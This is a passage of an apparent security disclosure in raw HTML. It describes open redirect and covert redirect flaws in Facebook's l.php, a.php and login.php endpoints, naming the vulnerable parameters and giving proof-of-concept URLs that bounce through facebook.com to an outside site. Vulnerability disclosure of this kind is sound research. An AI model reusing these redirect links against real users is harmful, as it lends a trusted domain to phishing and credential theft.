<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>youtube.com%2Fwatch%3Fv%<wbr></wbr>3DNdWaZkvAJfM&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwplx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=GAQHkk7KaAQFgp-<wbr></wbr>1UpPt8vTc1mpZVcR-<wbr></wbr>ZCObBHYZTd6oRUA&enc=AZPA-<wbr></wbr>1iOt4L5BTDo2RMqXagplQxCjYMuw6L<wbr></wbr>ZzH3XdMeOpvvcwMdzZwplx5OZLlH0q<wbr></wbr>8QszFr2Nu9Ib_tA8l8So-pW&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) Facebook File "a.php" Open Redirect Security Vulnerability</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.1)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a>file: "a.php"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> <b>parameter "u"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><c> authentication parameter: "eid"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><d> form: "eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><e>The authentication has no relation to all other parameters, such as "mac", "_tn_".</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F%252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%253Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D8782431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER%257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCuD-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAkinLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgUY6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Ffb-nym.<wbr></wbr>adnxs.com%2Ffclick%3Fclickenc%<wbr></wbr>3Dhttp%253A%252F%252Fbs.<wbr></wbr>serving-sys.com%<wbr></wbr>252FBurstingPipe%252FadServer.<wbr></wbr>bs%253Fcn%253Dtf%2526c%253D20%<wbr></wbr>2526mc%253Dclick%2526pli%<wbr></wbr>253D8782431%2526PluID%253D0%<wbr></wbr>2526ord%253D%257BCACHEBUSTER%<wbr></wbr>257D%26cp%3D%253Fdi%<wbr></wbr>253DzGxX6INl-T9QvRSibN_<wbr></wbr>3P5qZmZmZmfk_UL0Uomzf9z_<wbr></wbr>ObFfog2X5P_WPPCuD-to_<wbr></wbr>CKEeLew3cQIQkc9SAAAAAHQcDQB2BQ<wbr></wbr>AAKAcAAAIAAAD4iq8AanMCAAAAAQBV<wbr></wbr>U0QAVVNEAGMASABq4DoFka4BAgUCAQ<wbr></wbr>UAAIgAkinLswAAAAA.%252Fcnd%<wbr></wbr>253D%<wbr></wbr>252521qQYdPgjeqqYBEPiVvgUY6uYJ<wbr></wbr>IAA.%252Freferrer%<wbr></wbr>253Dfacebook.com%252F&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&eid=<wbr></wbr>5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.2) Facebook Login Page Covert Redirect Security Vulnerability</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL Related to Login.php Based on a.php:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fopenhouse2014%252F%253Futm_source%253Dfacebook%2526utm_medium%253Dcpc%2526utm_campaign%253Dopenhouse2014%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>rp.edu.sg%252Fopenhouse2014%<wbr></wbr>252F%253Futm_source%<wbr></wbr>253Dfacebook%2526utm_medium%<wbr></wbr>253Dcpc%2526utm_campaign%<wbr></wbr>253Dopenhouse2014%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFB